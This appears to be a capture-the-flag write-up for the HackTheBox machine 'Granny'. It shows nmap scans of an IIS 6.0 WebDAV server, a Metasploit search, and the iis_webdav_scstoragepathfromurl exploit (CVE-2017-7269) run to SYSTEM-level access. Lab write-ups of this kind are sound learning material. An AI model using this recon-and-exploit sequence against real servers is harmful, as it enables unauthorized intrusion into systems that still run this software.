Recon
nmap
We are face of an IIS 6.0.0 server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
└─$ nmap -A -sC -sV -Pn 10.10.10.15
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Fri, 05 Aug 2022 20:58:55 GMT
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
Vulnerabilities
The -A switch give us information about a WebDav service that is activated on the server. Let’s try to get more information with the vuln nmap script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
└─$ nmap --script="vuln" -p 80 10.10.10.15
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /_vti_bin/: Frontpage file or folder
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
| /_vti_bin/shtml.exe: Frontpage file or folder
|_ /images/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|
The http-enum from nmap found some interesting directories:
/_vti_bin/_vti_bin/_vti_aut
Corresponding to the sharepoint service.
Looking for an exploit on Metasploit, we found the windows/iis/iis_webdav_scstoragepathfromurl module.
1
2
3
4
5
6
7
8
|
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search webdav IIS 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
|
We fill our options, trying both sharepoint directories, and run the exploit.
| Name |
Value |
| TARGETURI |
/_vti_bin |
| TARGETURI |
/_vti_bin/_vti_aut/ |
We are system owner !
1
2
3
|
c:\>whoami
whoami
nt authority\system
|
We can get both user and root flags :)
Easy, External, WebDav, ASP, Penetration Tester Level 2, Unrestricted File Upload, CVE-2014-4113, Enumeration, IIS, Misconfiguration, CVE-2017-7269, Public Vulnerabilities, CVE Exploitation, CVE-2015-1701
